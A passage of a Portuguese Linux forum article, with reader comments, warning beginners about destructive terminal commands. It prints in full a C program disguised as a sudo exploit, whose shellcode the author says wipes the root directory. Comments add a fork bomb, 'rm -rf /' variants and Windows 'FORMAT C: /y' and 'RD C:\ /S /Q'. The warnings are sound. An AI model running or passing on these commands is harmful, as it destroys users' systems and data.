O terminal é sem dúvida uma poderosa arma, feito para facilitar a nossa vida, assim como uma faca de cozinha que ajuda em muito na hora de cozinhar. Porém como uma faca em mãos erradas é sinal de perigo, assim é o terminal com o trio copiar-colar-enter.
5. Você já ouviu falar que os olhos podem mentir? Bem, às vezes. O que você verá no seguinte arquivo escrito em C por alguém alegando ser uma correção de uma falha de segurança do "sudo" é na verdade a raiz de todo o mal.
... #### NÃO SE ATREVA A COMPILAR ISSO E EXECUTAR ######
#### ESSE CÓDIGO LOCO FOI TIRADO DA SEGUINTE PAGINA ####
#### http://seclists.org/fulldisclosure/2007/Aug/0071.html ####
/*
* off by one ebp overwrite in sudo prompt parsing
function
* discovered by beyond security in 2007, thx ge
*
* to compile: gcc -pipe -o sobo sobo.c ; ./sobo
*
* please use responsibly! a patch has already been
sent
* upstream and a fix will be included in the next
sudo release
*
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
#define SPROMPT "%u@%h> \\%"
#define shellcode esp
#define RETS_NUM 246
#define NOPS_NUM 116
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
void fill (char *buff, int size, unsigned long val) {
unsigned long *ptr = (unsigned long *) buff;
for (size /= sizeof (unsigned long); size > 0;
size--) *ptr++ = val;
}
unsigned long get_sp (void) {
__asm__ ("lea esp, %eax");
}
char *exp (char nops_nums, char rets_nums, char
*shellcode) {
int size = strlen (SPROMPT) + nops_nums + rets_nums
+ strlen (shellcode);
unsigned char *nops = alloca (nops_nums);
unsigned char *rets = alloca (rets_nums);
unsigned long ret = get_sp ();
static char exp_buffer [8192];
/* ensure isatty() fails */
close (0); close (1); close (2);
fill (nops, (unsigned char) nops_nums, 0x90909090);
fill (rets, (unsigned char) rets_nums, ret);
if (size > sizeof (exp_buffer)) {
fprintf (stderr, "buffer is too small\n");
return NULL;
}
snprintf (exp_buffer, sizeof (exp_buffer),
"%s%s%s%s",
SPROMPT, nops, shellcode, rets);
return exp_buffer;
}
int main(int argv, char *argc[]) {
char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p",
exploit, "/bin/false", NULL);
/* shellroot should await you @ "HISTFILE=/dev/null
/tmp/.beyond -p" */
return 0;
}
Então, esta é uma versão do código hexadecimal para "rm -rf / &". Isto faz nada mais nada menos que limpar o seu diretório raiz.
Estas são apenas algumas orientações para que você não seja enganado e pense que o Linux não presta, ele é muito poderoso e esse poder todo fica ao seu dispôr, por isso lembre-se do conselho do tio Ben.
Se você quiser aprender Linux, conquistar o poder sobre o seu computador, se divertir e ser produtivo, é preciso ter cuidado e partilhar o seu conhecimento.
Se você tem algum conhecimento sobre o Linux que deseja compartilhar, escreva nos comentários ou me mande uma mensagem por e-mail.
[3] Comentário enviado por thiagods.ti em 07/07/2009 - 15:21h
:(){:|:&};:
Vou explicar esse comando =)
:() isso aqui cria uma função
{} pode se notar 2 chaves uma no começo e outra no final do comando, são as chaves de abertura da função.
:|:& o que isso faz, na realidade chama a função :() (que você acabou de criar) e pega a saida dela e manda para outra função :() porém em segundo plano.
O ; no final finaliza a função e a linha e os : final chama a função para ser executada.
Senão me engano é isso.
Ai abre tantas funções dessa que sua memória é consumida em pouco tempo pois cada função que for chamada emite o comando de chamada de função para outra função e vai para segundo plano e assim sucessivamente.
[7] Comentário enviado por removido em 07/07/2009 - 16:07h
mano, por isso que faço tudo como usuario normal, e meu user soh tem permissão pela propria pasta de documentos ~/ e os meus principais dados coloco em partição diferente onde nao tem risco de qualquer usuario mexer
root soh quando for realmente necessário
=============================================
cara, ta de parabéns pelo artigo, muito bom msm
as unicas que nao sabia foi o programa em C "nao conheço nada de C"
/dev/null
:(){:|:&};:
fiquei muito surpresso pelo comando :(){:|:&};: pois ele pode ser executado por um usuario normal ao contrario do Rei maligno rm -rf /
[9] Comentário enviado por cruzeirense em 07/07/2009 - 17:25h
Isso me lembra o "Vírus português".
Era um manual que ia instruindo o usuário a como destruir o seu computador.
É por isso que dou bastante valor a interface gráfica. Independente de você estar como root ou não ela sempre te pergunta antes de excluir alguma coisa (se bem que quase ninguém lê isso mesmo)
Agora, na minha opinião isso é uma falha de segurança, pois você conseguir destruir um sistema não faz muito sentido.
Será que algum dia alguém vai precisar deste comando [ rm -rf / ] ?
O artigo ficou 10!
Por isso sempre recomendo aos meus clientes a procurarem ajuda em sites confiáveis, como o VOL.
[10] Comentário enviado por removido em 07/07/2009 - 18:30h
eu nao vejo como uma falha de segurança, e sim o poder do Super-Usuario que tem sobre o sistema, e se eu realmente quiser usar o "rm -rf /" e nao conseguir?? q porcaria de sistema que nao deixar eu fazer oq eu quiser!!!
por isso sempre digo, ROOT SÓ QUANDO FOR REALMENTE NECESSÁRIO, e nunca de poder para o usuario "msm se for seu proprio usuario" caso execute algo deste tipo vc nao terá problemas, pegue um usuario normal e tente executar isto, ele vai escluir soh oq ele conseguir
quanto mais bloquear as permissoes do usuario "conta", mais seguro ficará seu sistema
ainda nao sei oq passa na cabeça de certos malucos que criam usuario com poder de adm etc. Entao pra que serviria o root??
==========================================
PRINCIPAL FALHA DE SEGURANÇA É:
habilitar o sudo para o usuario, sudo soh eh bom para contas administrativas "Não ROOT"
[11] Comentário enviado por dbahiaz em 07/07/2009 - 18:37h
Parabéns pelo artigo, realmente nota 10!
Cruzeirense, esse comando não pode ser considerado como falha de segurança, porque na verdade isso não é "um" comando, como foi dito no texto: "Esses comandos não são feitos para fazer mal ao seu computador, mas com um par de opções, pode ser muito perigoso. "
Sendo assim:
#rm -rf / (pode ser perigoso)
$rm -rf Pastaprovisoria (não)
Imagina um servidor sem modo grafico, e o admin precisa liberar espaço e apagar um diretorio qualquer.
[12] Comentário enviado por marquinhos1875 em 07/07/2009 - 18:57h
Rapazz
em 5 ano de usuário root, nunca tive problemas, sem contar que o rm -rf e um comando quase de meu dia a dia.
outra coisa, nunca rodo um script sem olhar tudo nele, não por desconfiança mas sim como fonte de conhecimento (sugiro que todos tb façam)
abraço a todos, Ops, quase esquecia. Muito bom o artigo, parabéns cara e sempre bom alertar essa galera que está começando agora
[13] Comentário enviado por removido em 07/07/2009 - 19:02h
ainda axo que eh uma liberdade de escolha e poder do Super-Usuario
falha seria se qualquer um pudesse fazer isso, ai vai depender do adm"ROOT" escolher as prioridades de quem pode fazer oq!!!
PORQUE NAO EH UMA FALHA??
1° se fosse uma falha, seria facilmente corrigida ja a muito tempo
2° msm sistemas da MS que investem milhoes e milhoes em um SO "Windows" daria para fazer isso
3° se fosse realmente uma falha, varias outras tbm seriam, se começar a bloquear todas as falhas, entao bloqueia logo a integração do ser humano com o pc, afinal o ser vivo que mais erra eh o humano
4° como ja disse, comandos desse tipo eh soh para quem tem poder no sistema, e o root tem que ter poder de 100% do sistema "100% cravados e nao 99.9%"
[15] Comentário enviado por albfneto em 07/07/2009 - 21:02h
Puxa muito legal!
sempre fazemos artigos e dica do que se pode fazer, e não do que NÂO SE DEVE FAZER.
Legal e muito original. 10!
Bom, os comandos não foram feitos para o Mal, mas o script do final do artigo.... esse foi feito por Mal, mesmo!
Legal.... as vezes cuidado, em vez de vc ter um LINUX MATADOR, vc tem UM MATADOR DE LINUX....
[18] Comentário enviado por artus.rocha em 08/07/2009 - 00:44h
Cara, bacana esse artigo
Mais um motivo para gostar de distros como Slitaz, Tyni Core, Goblinx, Slax, Puppy, etc.
Com estas distros, só os arquivos do usuario estão de certa forma desprotegidos, mas, neste caso, cabe a ele manter backups, de qualquer forma não se pode por muita confiança no Hd, sendo um dos hardwares mais frageis.
Gosto de distros modulares, que utilizem largamente os recursos como Unionfs, Squashfs, caracteristicas de Livecds, e chroot também. Recursos que na minha opnião, deveriam ser mais utilizadas, é claro, dando a devida importancia ao desempenho.
Com o unionfs, é possivel criar uma sandbox, que salvará as mudanças num espaço reservado, preservando os dados originais. O Carlos Morimoto do GDH, fez um artigo bacana ensinando como configurar um ambiente numa sandbox, através do union, neste ambiente o sistema era restaurado a um estagio original em cada inicialização, mesmo os arquivos que tivessem sido deletados retornariam.
Falou! fica a dica, para o pessoal sempre tentar achar ajuda em foruns confiaveis, como no proprio VOL e outros .
[19] Comentário enviado por albfneto em 08/07/2009 - 01:20h
Pois é, é perigoso trabalhar todo o tempo como root, e ainda no forum do sabayon tem gente querendo saber como logar gráfico o tempo todo como root, aíi é complicado, não é bem um user root, é um system root, podendo estar rodando dentro do grupo root, dependendo de como conduz a sessão...
tudo escreve em tudo, de qualquer maneira...
é muito arriscado, vc pode detonar seu linux em poucas sessões de login...
é bem mais seguro usar sudo, ou as vezes su...
[20] Comentário enviado por nelson777 em 08/07/2009 - 08:57h
Por causa de seu artigo postei um comentário no fórum mostrado na 1a página alertando para o que aquele indíviduo tentou fazer. Não parece ser o mais confiável dos fóruns por isso tá sujeito ao post não ficar muito tempo por lá. Tomara que ajude alguém. Ô babaca grande.
[21] Comentário enviado por felipemartinsss em 08/07/2009 - 09:38h
Legal o artigo.
Dificilmente eu tentaria fazer alguma dessas coisas.
Mas é bom saber que não devemos duvidar do poder do shell rs.
Depois desse rm -rf /
vou pensar muito bem antes de executar algum comando que ainda não executei.
[25] Comentário enviado por netocba em 08/07/2009 - 15:25h
muito bom o artigo amigo
mais tem que resaltar que , se vc não sabe o que ta fazendo nem sempre use o f , pois ele forca o comando a ser executado e mesmo se vc tiver sabendo use o v , que ele mostra o que ta fazendo ex : se vc der 1 rm -Rfv / , ele vai te mostrar que vc estara removendo o ponto de montagem R = Recursivo f = force v = verbose , outro tambem que deve ser lembrado eo "purge" , nunca remova nehum aplicativo usando o purge , pois ele apaga tudo , todas as bibliotecas compartilhadas , inclusive as bibliotecas usadas pelo progragama a ser apagado..
[26] Comentário enviado por cruzeirense em 08/07/2009 - 16:12h
Ainda acho que é um erro de segurança.
Por exemplo, no windows quando você abre a pasta system32 os arquivos ficam todos ocultos e fica um aviso dos males que podem ocorrer caso o usuário altere essa pasta. Mesmo que você der um del *.dll o sistema não vai apagar os arquivos necessários ao windows pois ele sempre vai falhar antes (faça um teste aí...).
No caso do linux o comando rm -rf deveria ser inteligente o bastante para, quando o cara digitar
rm -rf /
surgir o seguinte aviso:
"Este comando vai excluir todos os dados da partiçao e o seu sistema não vai iniciar novamente. Deseja continuar?"
o mesmo deveria ocorrer para pastas do sistema (/etc, /usr, etc...)
Acho rídiculo o argumento de que se o usuário não utilizar o root não vai ter problemas, pois um usuário normal pode ter o mesmo efeito com o seguinte comando:
sudo rm -rf /
apenas 4 letrinhas a mais...
Ou então ele pode fazer simplesmente
rm -rf ~/
O que vai apagar todos os seus dados, que normalmente é o mais importante.
[27] Comentário enviado por stremer em 08/07/2009 - 17:53h
amigo... só um comentario a partir do item 5...
isso não é alegado como uma correção de falha de segurança... e sim um programa para explorar um erro do sudo....
ele fala que a correção do sudo estará disponivel...
mas isso é um programa que da um exploit no sudo e te da acesso de root....
um programa destes aliado a um malware (que não é o caso mostrado) poderia sim fazer um estrago... e pior... usando uma conta de usuário comum e sem pedir nem mesmo a senha do root....
bastaria alguem gerar um programa bobo do tipo cartão virtual, te mandar por e-mail e vc clicar... se tivesse com a falha de segurança bau bau.... seu sistema ja eras... igualzinho no windows....
e não foi culpa do usuário... pois ele esta acessando como um usuário limitado onde muitos acham que estão seguros e podem clicar em qualquer lugar...
do resto.... o terminal do linux não é brinquedo da mesma forma que o cmd do windows.... a diferença é que winusers tem habito de utilizar o sistema como Administrador.... mas isso é outra história...
o artigo é valido para iniciantes.... mesmo com este pequeno erro no ultimo item...
SUDO eh um rombo enorme na segurança, agr falar que msm um usuario normal nao está seguro msm estando em usuario...
se estiver com um sistema muito bem configurado, estará muito bem seguro
COMO????
1° desabilita o sudo do usuario "o ubuntu vem habilitado pois muitos usuario do windows que vem pro linux usa ubuntu, e a maioria nao gosta de ter trabalho de ficar digitando o bom e velho "su + senha"
2° nunca de permissão de escrita para o usuario "a nao ser a pasta dele ~/" e msm assim podemos bloquear algumas coisas dependendo da ocasiao
3° bloquear varios comandos para que nenhum baitola possa ir lah e fazer cagada como o ":(){:|:&};:"
=======================================
DISTRIBUIÇÕES LINUX BEM E MAL SEGURAS
seguros:
1° sem duvida o 1° lugar vai para o Slackware, muita gente nao gosta por ser robusto e trabalhoso de mexer, mas isso que eh o bom, nao vai ser qualquer "cocodepessoa" que vai fazer merda, sem contar que vem com o sudo desabilitado e as permissões sao muito bem atribuidas
inseguros
1° sem duvida eh o tao conhecido Ubuntu, por ser equipado de programas instaveis e em testes "beta" e ja vem com o sudo habilitado "o pior que o sudo com maior poder msm" e assim que vc cria uma conta de usuário quando instala, na verdade nao eh uma conta usuario e sim uma conta ADM, assim fazendo muitos usar o sistema diariamente como ADM
======================================
openBSD eh o SO mais seguro existente, e ve se com qual ele se parece mais, Ubuntu ou Slackware
[29] Comentário enviado por Teixeira em 08/07/2009 - 21:51h
Quanto ao FORMAT C:\*.* realmente não existe.
Talvez você esteja referindo ao DEL *.* que apaga todos os arquivos com qualquer extensão dentro do diretório corrente.
Mas o sistema solicitará uma confirmação.
FORMAT C: irá formatar o volume C: mas também solicitará antes uma confirmação (Isso a partir do DOS 3.0, pois antes não pedia para confirmar).
Entretando, o parâmetro /Y serve para burlar essa aparente segurança , pois é entendido como uma resposta SIM ("yes"), confirmando assim o comando, sem maiores considerações.
DEL *.* /y ou FORMAT C: /y detonam os dados imediatamente.
Lembro-me que muitas revistas especializadas - e famosas - traziam dicas terríveis.
Uma delas "ensinava" a renomear um diretório inteiro, porém tinha um baita-bug e se o incauto usuário fizesse isso a partir do diretório-raiz, renomeava todos os arquivos do disco.
Quem precisa de virus, com uma "ajuda" dessas?
Ao autor do artigo, parabéns!
É de grande utilidade chamar à atenção dos novatos E DE MUITA GENTE EXPERIENTE para esses perigos.
A "Lei de Murphy" está sempre nos rondando. Portanto, cuidado!...
[30] Comentário enviado por thiagods.ti em 09/07/2009 - 10:48h
cruzeirense
" No caso do linux o comando rm -rf deveria ser inteligente o bastante para, quando o cara digitar
rm -rf /
surgir o seguinte aviso:
"Este comando vai excluir todos os dados da partiçao e o seu sistema não vai iniciar novamente. Deseja continuar?" "
Você não acha que o usuário que deveria ser inteligente de não digitar isso? e justamente pq ele colocou a opção -f e como já foi avisado quer dizer --force ele não te pergunta nada, simplesmente vai removendo.
Agora se tu usa windows.. e acha que ele sim é um SO inteligente pq qualquer coisa q tu executa ele fala "você tem certeza que deseja executar isso?" para né -.- e o pior que todos colocam "yes" na resposta.. aposto que você já baixou um crack da internet.. substituiu pelo .exe original do jogo ou do software qualquer e quando foi executar.. o windows fez essa pergunta e você aceitou! ou seja.. pra q essa segurança então? o.O ali poderia ter um trojan e você até hoje não sabe!
" Acho rídiculo o argumento de que se o usuário não utilizar o root não vai ter problemas, pois um usuário normal pode ter o mesmo efeito com o seguinte comando:
sudo rm -rf / "
É só tu configurar direito que não terá problema nenhum, posso fazer um usuário que utilize sudo só ter acesso a certos comandos e diretórios -.-
E só mais um detalhe, no windows pelo menos antigamente não sei hoje.. você dava boot pelo dos digita format c: /y e simplesmente o windows não ia ti fazer uma pergunta.. e ia apagar todos os seus dados o.O mas ó .. que falha de segurança não é mesmo!? ¬¬ o pior que qualquer usuário podia fazer.. =X isso sim é uma falha de segurança!
[31] Comentário enviado por m4iir1c10 em 09/07/2009 - 10:50h
stremer = ops!!!! Falha nossa...
douglasfim = Sudo nao e uma falha de seguranca, pelo contrario e uma seguranca das boas, porque sem o sudo para fazer modificacoes administrativas no sistema, voce deveria literalmente fazer o log-off do usuario comum, e fazer o login do root para poder fazer as modificacoes, criando assim um risco muito maior ao sistema, imagine a confusao que seria para um novato fazer isso e depois que ele voltasse como usuario normal as permissoes dos arquivos que ele editou na propria pasta do usuario estariam com as permissoes modificadas e ele nao poderia mexer novamente... que sufoco so de pensar...
Teixeira e julianoas = ops!!! Bom mais vamos olhar pelo lado possitivo, e um erro no windows digitar isso, essa comunidade e Linux, tem gente que nao ta nem ai pra isso... :)
cruzeirense = imagine que voce quer deletar as pastas do kernel que voce nao usa mais. digamos que o primeiro kernel do seu sistema era o 2.4.22 e agora e o 2.6.30, voce ja modificou o seu grub, porem aqueles arquivos estao la enchendo o seu hd, como voce apagaria mais de 100 mil pastas do kernel sem usar o comando rm ? Provavelmente voce usaria a interface grafica mesmo que isso sgnifica-se o dobro do tempo... certo? como voce apagaria com um script ?
[32] Comentário enviado por iguito em 09/07/2009 - 11:50h
Muito bom o artigo.
Por isso acho que o que o Ubuntu e outras distribuições que se propõe a facilitar o uso fazem está certo: diminuir a dependência do terminal para poder usar o Linux. O usuário leigo vai entrar num fórum e sair digitando no terminal tudo o que lhe for informado. Na interface gráfica, pelo fato de ter bem mais semelhança com o Windows do que o terminal, o usuário leigo terá um pouco mais de noção do que está fazendo, e isso diminui a chance de coisas erradas serem feitas.
[33] Comentário enviado por cruzeirense em 09/07/2009 - 12:24h
Prezado thiagods.ti
Sobre o seu comentário:
"É só tu configurar direito que não terá problema nenhum, posso fazer um usuário que utilize sudo só ter acesso a certos comandos e diretórios -.-"
Você simplesmente confirmou o que eu disse, que o sistema vem com uma falha de segurança, que depende de configuração para ser corrigida.
Por padrão na instalação do ubuntu, que é a distribuição mais utilizada (inclusive é a que eu uso), o sudo vem habilitado por padrão.
Eu até entendo o onde se quis chegar com isso. A idéia do ubuntu é fazer um linux mais fácil, dando mais flexibilidade para o usuário em detrimento da segurança.
[34] Comentário enviado por removido em 09/07/2009 - 14:53h
discordo completamante com o thiagods
1° o comando "rm -rf /" eh para ser executado a força -f e sempre que executamos a força nao pode fazer essas perguntas chatas
==============================================
2° o windows eh inteligente, mas msm ele sendo um SO milionario podemos fazer esse tipo de estrago, ACREDITO QUE VCS NAO LERAM OS COMENTARIOS ACIMA, mas msm assim vou colocar o video aki dnovo
OLHEM O COMENTARIO 14:
veja alguns comandos do DOS como: RD C:\ /S /Q
3° isto prova que realmente vcs nao leram msm e ja estao falando muito, vcs falam em usar sudo e tals, sudo nao vem como padrao nas distribuições mais seguras
qual umas das distribuições mais seguras e estaveis do linux?? SLACKWARE
qual distribuição foi encontrada mais vulnerabilidade que no windows?? UBUNTU
esse povo usuario de windows que vieram para o linux usando ubuntu, acham que ubuntu eh melhor por causa da facilidade e do sudo, qualquer um que invadirem vcs tbm terao o acesso root graças ao sudo "mal configurado, ou seja, o padrao de quase todos"
======================================
ubuntu foi feito para usuarios com pouca experiencia no assunto conseguise usar linux, mas eles deveriam alertar o sudo habilitado e deixar ele configurar o sudo de maneira grafica, afinal muita gente nem usa mais o terminal
nada contra o ubuntu, mas os usuarios que deveriam prestar mais atenção com certos problemas no ubuntu
=======================================
mauricio
nada contra o sudo, afinal entendo o seu ponto de vista e ateh concordo, mas vamos analizar melhor os casos
quando instalamos o ubuntu, ele cria uma conta root, depois vem a opção de criar uma conta
nao tive muita experiencia com o ubuntu, mas como ja ouvi falar, o usuario que criamos na instalação eh um usuario ADM, e nao um usuario para usarmos no dia a dia
1° podemos ter acesso as outras contas administrativas sem o sudo
2° sudo serve mais para contas adm, e nao para usuario, afinal temos que fazer tudo como usuario e quando precisar usar o root "su + senha"
3° usuarios do ubuntu sempre usam a contra criada para o adm, e nao criam uma conta para usuario com poucos privilegios, o pior eh que depois ainda ficam falando em "sudo rm -rf /" esse tipo de comando jamais deve ter acesso ao usuario
[35] Comentário enviado por removido em 09/07/2009 - 15:07h
nao fiz o teste ainda, pretendo futuramente tentar numa VM
caso digitamos algo como
# chroot /usr/local/bin
# rm -rf /
================================
ele iria deletar qual diretorio???
/usr/local/bin ou /
caso for o diretorio "/usr/local/bin" e ainda fazer uma pergunta ridicula como:
"Este comando vai excluir todos os dados da partiçao e o seu sistema não vai iniciar novamente. Deseja continuar?"
=====================================
msm que dificilmente alguem ira usar o comando "rm -rf /" para algo util, mas eh sempre bom que ele esteja lah para quando quisermos executar
1° vc axa que os desenvolvedores do linux, bsd, windows ja nao pensaram a destruição que isto pode causar?? acredito que sim, e a muito tempo ainda, antes de vc existir
unics - 1969
mas poucos sabem que o unics foi baseado em um outro SO
multics - 1965
por isso digo que se ateh hj ainda existe a possibilidade destes comando destruidor existirem, devem ter alguma justifica muito boa, e nao vai ser nem eu e nem vcs que podem falar mau dos incriveis desenvolvedores que tornaram isto possivel
achem ruim quem quiser, mas este comandos sempre vai existir, UHUUUULLL
[36] Comentário enviado por cruzeirense em 09/07/2009 - 16:41h
Acho bobagem comparar linha de comando linux com comandos do dos.
Quem no windows usa linha de comando? Até administradores usam normalmente a interface gráfica.
O comando dos em questão seria:
1-Format c: /y (o windows não permite formação da partição do sistema)
2-RD C:\ /S /Q (no windows você não consegue excluir arquivos carregados na memória, então o comando vai falhar antes de fazer um estrago grande)
[37] Comentário enviado por thiagods.ti em 09/07/2009 - 17:33h
Douglasfim
Não fui eu que falei aquilo, foi o cruzeirense.. eu estava retrucando ele.. olha as aspas " " entre as frases.. isso quer dizer que é um comentário de alguém, uma citação =D
Renato (cruzeirense),
Desculpa minha indignação akela hora, mas não pude evitar.
Enfim, o windows vem configurado você como o usuário admin também, isso é falha de segurança?
O usuário do ubuntu normal tem o sudo para poder fazer as configurações, senão como eu ia ter acesso a root? Todas as distribuições que não tem o sudo fazem você ter que acessar a conta root para pelo menos configura-lo do jeito que vc quer.
A grande vantagem do sudo é que eu posso ti dar permissões só para o que eu quero e isso no windows é um pouco defasado, visto que eu não consigo abrir nem o calendário (por que pode alterar a data por ele) se eu não for um usuário com previlégio para isso, porém eu não posso dar permissão para um usuário que é quase totalmente restrito poder visualizar apenas o calendário.
nao estou falando que o sudo eh uma falha "nao quis levar no pé da letra", mas:
1° um usuario de windows que nao tem ideia de como usar linux, ai ele vai instalar o mais facil e amigavel e recomendado pela maioria "Ubuntu" - eu ja recomendaria o mandriva "preferencia ao powerpack"
2° ele nao tem a minima ideia doq eh o sudo, muito menos configurar, afinal quem ta começando nao sabe nem oq eh root
3° com um poder de root para um usuario normal que nao tem conhecimento, pode acabar fazendo varias cagadas, e nao acredito que ele venha fazer o matador "sudo rm -rf /", pq nao eh de uma hora para outra que ele ja vai descobrir oq eh "rm" nem "-rf" e muito menos "/" ainda mais o "sudo", e nao vai ser batendo no teclado de qualquer jeito que vai dar uma supercagada de digitar certinho este comando
se alguem digitar isso "rm -rf /" com certeza sabe oq esta fazendo, ou pelo menos sabe que vai remover algo e ja vai saber tbm oq eh /, muitos usuario vem procurando o C: ai sempre alguem acaba explicando como funciona os diretorios do linux e todos os livros e apostilas para iniciante em linux explica algo sobre diretorio
bloqueando a permissao do comando "rm -rf /" estaria limitando o root que seria o super usuario "que na verdade nao seria mais tao poderoso"
root 100% de poder e controle no sistema, e nao 99,9%
=========================================
contas do windows, msm criando uma conta como adm, ele nao seria 100% adm, pois tem uma conta do adm msm que seria o root, eh soh ficar apertando F5 antes de inicializar o sistema que vcs verao o maior poderoso do windows
[39] Comentário enviado por thiagods.ti em 10/07/2009 - 08:45h
Bom e a vantagem do sudo como eu havia falado.. é que para um administrador, ele pode dar permissões só para devidos comandos para os usuários que irão utilizar o sudo. Comandos esses que podem ser até comandos de root como todos já sabem, o problema do ubuntu, é que ele vem com o sudo valendo tudo, inclusive vc pode dar um:
$ sudo su -
Isso em um servidor é foda, porém se eu sou um administrador e eu quiser dar permissão para o usuário fulano modificar a hora do servidor para testes, eu posso. ;) (exemplo patético).
Mas entenderam onde eu quis chegar? Por isso não acho uma falha de segurança.. a maior falha de segurança que tem são as pessoas mesmo!
É bem capaz de ter usuários com poder de sudo que tem acesso ao / e deixa a senha embaixo do teclado, ai chega um esperto, olha a senha, entra no servidor e digita $ sudo rm -rf / e foisse tudo.
[40] Comentário enviado por stremer em 10/07/2009 - 11:30h
qualquer coisa que o usuário precisa DIGITAR OU CONFIRMAR NÃO É FALHA DE SEGURANÇA....
falha de segurança é um erro no aplicativo (no caso do item 5 do sudo) que permite SE TORNAR ROOT DO SISTEMA SEM PRECISAR DIGITAR A SENHA DO ROOT...
Falha de segurança existe em qualquer lugar... não é só no sudo....
mesmo no caso do BSD tão seguro, de nada adianta se usar um aplicativo inseguro nele e que precisa de bastante permissão para rodar...
Quanto mais enxugado o sistema mais seguro.... porém sistema desktop enxugado não existe, ou seja, no caso do desktop... QUANTO MAIS ATUALIZADO O SISTEMA MAIS SEGURO!!!
Se o usuário mandar o sistema tem de fazer.... isso não é falha de segurança!
[41] Comentário enviado por dastyler em 10/07/2009 - 12:04h
È até engraçado um post deste num forum aonde na própria pagina está escrito "Powered By FreeBSD".
Uma ironia sem tamanho. Aos new users de Linux eu sempre recomendo a leitura do Guia Foca, para que o user entenda a estrutura de diretórios e processos do pinguim, antes de se aventurar no mundo Linux.
Mas vc mandou bemem colocar este artigo, colega.
[]´s
[42] Comentário enviado por dastyler em 10/07/2009 - 12:07h
Ainda quanto ao rm -Rf /, eu sugiro que criem um alias do comando apontando para um comando invalido quando chamado em um terminal (colocando esse alias globalmente no sistema), ou um redirecionamento para um simples ls. Depois eu posto por aqui como fazer isso.
[43] Comentário enviado por removido em 10/07/2009 - 14:16h
eu nao disse que sudo eh uma falha de segurança "msm parecendo", um sudo bem configurado eh muito util como o thiagods falou, oq eu quis dizer eh que o ubuntu vem como padrao o sudo habilitado e pronto para ser usado com poder total a qualquer usuario
concordo com o stremer, afinal qualquer SO se começar a instalar porcarias ou qualquer coisa que nao eh confiavel, sem duvida pode deixar o SO vulneravel
dastyler, msm se criar uma alias para o "rm -rf /" quando digitarmos ls, ele tentará excluir tudo do pc, e se ele nao tem permissão nao funcionará, o erro que daria nao seria por executar e muito menos digitar o "rm -rf /" e sim por nao ter acesso de write"escrita" sobre a raiz do SO "/"
[50] Comentário enviado por andremedeiross em 22/09/2009 - 21:16h
me desculpe mas quem está falando mal do ubuntu está equivocado
o usuário que o ubuntu cria é um usuário limitado como qualquer um outro e é desabilitado o login do root, utilizo ubuntu a 2 anos e nunca tive problemas e sempre digito senha quando vou entrar numa área restrita do sistema, oque acontece com quem está com o sudo habilitado foi simples, não colocaram a senha na instalação, mas se vc coloca o caso é outro
me respondam
é mais fácil tentar invadir um serviço ssh como root ou como usuário?? claro q é como root pois para entrar como usuário vc tem que decifrar qual o nome do usuário e qual a senha, já como root apenas é necessário a senha, falo isso se o servidor ssh estivesse habilitado para acesso direto pelo root como na maioria das distros dispõem quando instala o ssh
aí está um entre tantos motivos para o root estar desabilitado e utilizar o sudo
o melhor ainda é que o usuário cadastrado na instalação tem permissão para usar o sudo desde que ele saiba qual a senha administrativa, se for criado outro usuário para utilizar fica mais complicado pois o outro usuário não vai conseguir nem usar o sudo e muito menos su, pois o primeiro teria que cadastrar o usuario no sudoers, dar permissão de usar sudo
já passei por slackware, opensuse, mandriva, kurumin, debian, e estacionei no ubuntu, respeito todas as distros, sei as caracteristicas de cada uma mas na minha opinião ubuntu é a melhor e será dificil de me convencer o contrário,
se ubuntu fosse tão inseguro assim minha vó e os netos leigos em linux dela não usaria ubuntu por tanto tempo sem ter uma unica falha, ou problema no sistema, toda vez que ia na casa dela o sistema estava do mesmo jeito, não precisava dar suporte e ainda por cima que o micro era disputado por eles,
se fosse tão inseguro assim os servidores com ubuntu server que configurei não estariam funcionando até hoje sem falhas, firmes e constantes dia e noite
[51] Comentário enviado por xerxeslins em 22/09/2009 - 22:57h
Em questão de segurança, 99% do que conta, é responsabilidade do usuário, o resto é do sistema. Ubuntu e Slackware são Linux do mesmo jeito, o que muda são as coisas que vem pré-configuradas, o resto é besteira.. parem de ficar discutindo que distro é mais segura =P
Sobre o artigo, tá ótimo! Informação interessante e útil.
[54] Comentário enviado por pmfire em 27/09/2009 - 13:55h
Excelente, eu uso Linux a pouco menos de 1 ano e sou do tipo que gosta de testar comandos, programas e scripts no meu note, e esses comandos juntando o dos colegas aí que postaram, já vão para os favoritos.
[55] Comentário enviado por Ramax em 29/09/2009 - 23:45h
Mesmo usando Linux há muito tempo, e também me considerando um usuário com relativa experiência, já deletei o / de um computador do trabalho. Queria remover um diretório da raiz mas quando digitei a primeira letra e apertei TAB, para a auto compleção, a primeira letra do diretório não foi digitada, mesmo sem nem notar, apertei ENTER. Não preciso dizer que o pior aconteceu... Só notei quando vi o retorno "/dev/*** device is busy". Para minha sorte, além do computador não rodar nenhum serviço essencial, o meu deslize não chegou a comprometer o /home. Meu próximo passo foi bootar o computador já com o DVD de instalação. Mesmo assim, todos os colegas pegaram no meu pé por um bom tempo, e com razão. Às vezes um descuido, pressa, ou até mesmo distração pode fazer você executar um comando em falso. Alguns comandos simplesmente não podem ser digitados em falso...
[56] Comentário enviado por removido em 01/10/2009 - 16:15h
Ótimo artigo meu amigo, hoje em dia muitas pessoas estão deixando o "JANELAS" para usar o ubuntu principalmente, mas muitas dessas pessoas não querem ler sobre linux, programas, comandos, e acabam colando no terminal tudo que lhe vier pela frente, claro que não podemos generalizar, mas isso acontece.
Por isso minha dica é a seguinte: Para qualquer comando que você for colocar no terminal, procure saber pelo menos o básico dele, para nunca ter seus sistema arruinado, ou má configurado por um comando que você não sabe o que realmente fez.
